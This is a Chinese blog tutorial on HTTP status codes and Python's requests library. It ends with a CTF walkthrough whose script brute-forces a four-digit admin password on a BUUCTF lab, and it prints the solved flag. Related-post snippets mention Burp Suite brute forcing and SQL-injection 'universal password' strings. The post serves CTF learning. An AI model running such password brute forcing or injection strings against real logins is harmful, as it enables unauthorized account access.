Python编程_1

最新推荐文章于 2024-03-19 11:20:55 发布
最新推荐文章于 2024-03-19 11:20:55 发布
阅读量152 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46022050/article/details/104102911
版权

1、 HTTP常见状态码介绍

当我们从客户端向服务器发送请求时
服务器向我们返回状态码
状态码就是告诉我们服务器响应的状态
通过它,我们就可以知道当前请求是成功了还是出现了什么问题
状态码是由3位数字和原因短语组成的(比如最常见的:200 OK)
其中第一位数字表示响应类别,响应类别从1到5分为五种

状态码响应类别原因短语
1XX信息性状态码(Informational)服务器正在处理请求
2XX成功状态码(Success)请求已正常处理完毕
3XX重定向状态码(Redirection)需要进行额外操作以完成请求
4XX客户端错误状态码(Client Error)客户端原因导致服务器无法处理请求
5XX服务器错误状态码(Server Error)服务器原因导致处理请求出错
常见状态码原因
200请求成功
301请求的资源已被永久的移动到新URI
302临时移动
400客户端请求的语法错误,服务器无法理解
401请求要求用户的身份认证
403服务器理解请求客户端的请求,但是拒绝执行此请求
404服务器无法根据客户端的请求找到资源(网页)
408服务器等待客户端发送的请求时间过长,超时
500服务器内部错误,无法完成请求
503由于超载或系统维护,服务器暂时的无法处理客户端的请求
504充当网关或代理的服务器,未及时从远端服务器获取请求
505服务器不支持请求的HTTP协议的版
HTTP常见方法说明
GET请求URL指定的资源。指定的资源经服务器端解析后返回响应内容
POST:传输实体主题
PUT传输文件
HEAD获取报文首部
DELETE删除文件
OPTIONS询问支持的方法
TRACE追踪路径
CONNECT要求用隧道协议链接代理

常见

2、python编程之HTTP请求

1、Request模块
Requests: 让 HTTP 服务人类,使用requests可以模拟浏览器的请求,比起之前用到的urllib,requests模块的api更加便捷(本质就是封装了urllib3)

注意:requests库发送请求将网页内容下载下来以后,并不会执行js代码,这需要我们自己分析目标站点然后发起新的request请求

官方文档:http://cn.python-requests.org/zh_CN/latest/

安装:pip3 install requests
调用:import requests
1、GET参数请求

  • 当无参数时
    使用request.get(url)调用
import requests #调用requests库
url = 'http://www.baidu.com' 
r  = requests.get(url) #获取url,将获取到的信息赋值给r
print(r.url)
  • 当有参数时
    使用request.get(url,params={key1:value,key2:value})
    当有多个参数时,直接往后面加就行了
    实例代码
import requests
url = 'http://127.0.0.1'
r  = requests.get(url,params={'uasrname':'user','password':'pass'})
print(r.url)

运行结果
在这里插入图片描述

2、POST参数请求

  • 无参数时
    使用requests.post(url)
  • 有参数时
    使用requests.post(url=url,data={key:value1,key:value2})
    同样如果多个数据那就直接加在后面,实列代码与GET参数传递类似

3、自定义请求头

header = {key:value}
	request.get(url,headers=headers)
	r   = request.get(url)

此段代码可以更改HTTP头的信息,代码如下

import requests
url = "127.0.0.1"
r1 = requests.get(url)
print(r1.headers)
headers   = {'Content-Length':'400'}
r = requests.get(url,headers=headers)#使用自定义的请求头
print(r.request.headers)

常见的获取HTTP信息的方式

代码说明
r.url输出url
r.status_code获取状态码
r.text获取响应文本(源代码)
r.content获取响应文本(2进制流数据)
r.headers获取响应头
r.cookie获取Cookie

ADD:这里r.content可以通过decode方式将2进制数据流解码成字符串
如:r.content.decode()

3、实战之破解弱密码

目标:BUUCTF-BUU BRUTE 1
打开题目显示账号为admin,密码为4为数字弱密码,因此可以直接写脚本进行暴力破解
在这里插入图片描述
参考代码

import  requests
url = 'http://33ff0af2-21cb-4c23-9368-4356a75f4f58.node3.buuoj.cn'
dict ='0123456789' #字典信息
for a in range(0,len(dict)): #生成1000-9999的数字
    for b in range(0,len(dict)):
        for c in range(0,len(dict)):
            for d in range(0,len(dict)):
                flag = dict[a] +dict[b] +dict[c] + dict[d]
                payload = {'username': 'admin', 'password': flag}
                r = requests.get(url, params=payload)
                print(r.content.decode()+flag)

最后得到结果flag{c94b1ffb-f512-42ba-b8da-1ad4710645ce}且密码为6490
在这里插入图片描述

II Sole
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】BUUCTF Brute 1解题详析(BurpSuite爆破实战)
等风来
04-28 5598
4、Cluster bomb:每个变量对应一个字典,并且交集破解尝试每一个组合,每个用户和每个密码进行匹配,两个字典。找到返回长度异于其它payload的请求(在此实例中即为admin),响应页面回显。2、Battering ran:对变量进行同时破解,用户名和密码相同,仅一个字典。由上可知,发送到第6491个请求时才爆破出密码为6491,而这个过程是十分慢的。3、pitch fork:每个变量对应一个字典,用户名和密码一一对应,两个字典。单独抓包时回显仅用户名错误,考虑先爆破用户名。
BUUCTFBUU BRUTE 1 1
qq_41369524的博客
12-08 1102
payload选择numbers,从0到9999(千万别写1000到9999,因为4位数字也包括0001之类的)攻击结果点击render可以看到响应包的渲染结果:从长度来判断,其他都是202,就admin是217.本题目名字brute意思是残酷的,暴力的。可以看出是get传参,并且是要我们填正确的用户名。发现遍历特别慢,靶机都过期了还没试出来。所以可以试试暴力破解来爆破用户名。等一会儿,成功爆破出密码:6491。首先试一下root/123456。所以成功爆破出用户名:admin。其他的都是:用户名错误。
BUU BRUTE 1(burpsuite爆破初学)
qq_45952875的博客
04-03 2092
(题外话,我的burpsuite一开始显示中文会出现方块乱码,找了一下解决方法,顺便知道了字号怎么改:Burp->Settings->User interface->Message editor->HTTP message display->Font改成DialogInput,字号在Size选)接着爆破密码,可以在Payload type把Simple list改成Numbers,也可以继续用Simple list载入0000~9999的字典,操作同上,找到密码查看Response得到flag。
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6371
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF -> Basic -> BUU BRUTE 1(详解)
m0_72986388的博客
09-25 3123
我们可以随便输入用户名和密码然后通过burp抓包,得到它的请求包,通过暴力破解从大量数据中获取到正确的用户名和密码。payload设置,从文件中加载爆破字典(没有下载过的需要下载,txt的即可)(这也就是爆破的意义所在,通过遍历一个文件,一个字典中的大量数据来得到一个正确的数据)发现不再是用户名错误,而是密码错误。攻击完成后我们发现长度有217和202,197这几种,且 217数量极少,且对应的payload都相同,点击它。显示登录成功,说明6490是正确的密码,复制flag,输入,这道题就完成了。
abaqus.rpy.zip_Python编程_Python__Python编程_Python_
08-09
Python编程则是Abaqus的核心部分,它提供了强大的脚本能力,使得用户可以自定义复杂的模拟过程和后处理步骤。这篇资料"abaqus.rpy.zip"显然是关于如何使用Python进行Abaqus操作的教程。 首先,让我们深入了解一下...
编程程序.zip_Python编程_Python__Python编程_Python_
08-09
急需开通,研三现在正在做毕设,需要这份资料,万分感谢
python编程_python关联_python编程_Python可视化_python关联分析_python_
09-30
Python编程领域,关联分析和可视化是数据科学中不可或缺的部分,尤其在进行复杂的数据挖掘和理解时。Python提供了丰富的库来支持这些功能,使得非专业程序员也能轻松处理和解析大量数据。以下是对这些知识点的详细...
python learning_python编程_learningpython_
09-29
Python学习:编程小白的第一本Python入门书》是一本针对初学者精心编写的教程,旨在帮助读者快速掌握Python编程的基础知识。这本书详细介绍了Python语言的核心概念、语法结构以及实际应用,使得学习过程既清晰又...
Python编程指南_Python编程指南_python_
09-30
Python编程指南是一本深入浅出的教程,旨在帮助初学者和有一定基础的程序员更好地理解和掌握Python这门强大的编程语言。Python以其简洁明了的语法、丰富的标准库和强大的社区支持,已经成为数据科学、Web开发、自动...
BUUCTF——Basic
计算机硕士的博客
06-16 1709
BUUCTF——Basic(详细版),包括了做题思路和详细步骤。Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1。
BUUCTF Basic 解题记录--BUU BRUTE 1
weixin_43171033的博客
09-14 552
BUUCTF Basic 解题记录--BUU BRUTE 1
buuctf-BUU BRUTE 1
m0_74013288的博客
09-24 946
当我们知道用户的账号,但不知道用户的密码时,可以使用万能密码,同样,它也不是一个真正意义上的密码,而是一个【拥有不同变体的格式】打开靶机后,我们可以看见一个登录界面,随机输入账号与密码,显示错误,那么Brup Suite进行爆破,找到正确账号为admin。需要注意的是,以下所有万能账号中的 a 可以是自定义的数字或字母,比如 1,2,3,b,c,d。密码随便输入,比如 123456。万能密码的使用:用户名输入 【万能密码】,比如 admin’ #需要注意的是:万能密码中的 admin,必须是真实的用户名。
熟悉http和https协议、ip、网关、子网掩码、路由器 以及burpsuit熟悉爆破模块:BUUCTF -> Basic -> BUU BRUTE 1
xuanqwertyui的博客
11-04 557
2.默认网关地址是主机位除了最后一位全置1后得到的。假设现有一个ip地址为193.6.7.0/24,根据网络前缀24可知前24位为网络位,后8位为主机位,因此该网络的默认网关地址就是IP地址193.6.7.11111110(加粗的部分为网络位),换算成十进制数即193.6.7.254/24。一台主机可以有多个网关。默认网关的意思是一台主机如果找不到可用的网关,就把数据包发给默认指定的网关,由这个网关来处理数据包。现在主机使用的网关,一般指的是默认网关。
BUUCTF Brute 1使用BurpSuite爆破详解
热门推荐
bill_fang的博客
08-28 1万+
最近研究一下白帽子安全,主要关注WEB安全,在做完了常规的靶场xsslab、SQLI、DVWA、Pikachu后,了解了白帽子安全的基础知识。进一步开始用一些CTF来练习。本文是从BUUCTF网站上,去解一个WEB的Flag的详细记录。0x00打开BUUCTF,打开靶机BUUCTF的地址在这里:BUUCTF在线评测 (buuoj.cn),进入后选择Basic->BUU BRUTE1.选择B...
BUUCTF/BUU BRUTE 1
最新发布
weixin_44041994的博客
03-19 221
从地址栏可以判断是采用了get请求,并且从错误信息可以判断该登录方法可能是先对用户名进行审查,正确后再判断密码,所以我们可以先对用户名进行暴破,得到正确用户名后再对密码进行暴破得到正确密码。选择好后,我们点击右上角的开始攻击,通过length我们看到admin的length出现不同,且返回的响应包内容变为"密码错误,为4为数字"可得知admin为正确用户名。攻击时我们发现有的请求返回429的状态码,查看返回的错误提示为Too many Requests,意思为太多的请求,我们需要调整我们请求的速度。
BUUCTF初学解题记录——Basic篇
u010152530的博客
05-04 5851
目录Linux LabBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1未完待续。。。 Linux Lab # 地址和端口为示例,需要更改为动态分配后的地址和端口 ssh root@node233.buuoj.cn -p 233 # 输入默认密码123456 cat /flag.txt # 输出flag: # flag{ef2a6029-xxxx-xxxx-xxxx-86fb808b12f2} # 一开始以为只要大括号的内容就行了。。。
BUUCTF basic BUU SQL COURSE 1
网安小趴菜
08-25 1127
BUUCTF basic BUU SQL COURSE 1
BUU BRUTE 1 优化解决方式
qq_40432713的博客
01-19 6114
题目 BUU BRUTE 1 简单fuzz后可知是一个四位密码的爆破,brupsuite或者脚本都可以解决。网上有很多简单的教学。 但是该题有一个问题就是会报429请求过多的错误。使用brupsuite线程开高了会触发报错,导致错过很多测试,线程开低的话速度又很慢。脚本的话速度就快很多了。参考了一下别人的脚本,但是他并没有处理429错误,于是这里改进一下: import time import requests url="http://23b71b6s-f202-4f59-9ab1-q19fcv1cda9
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值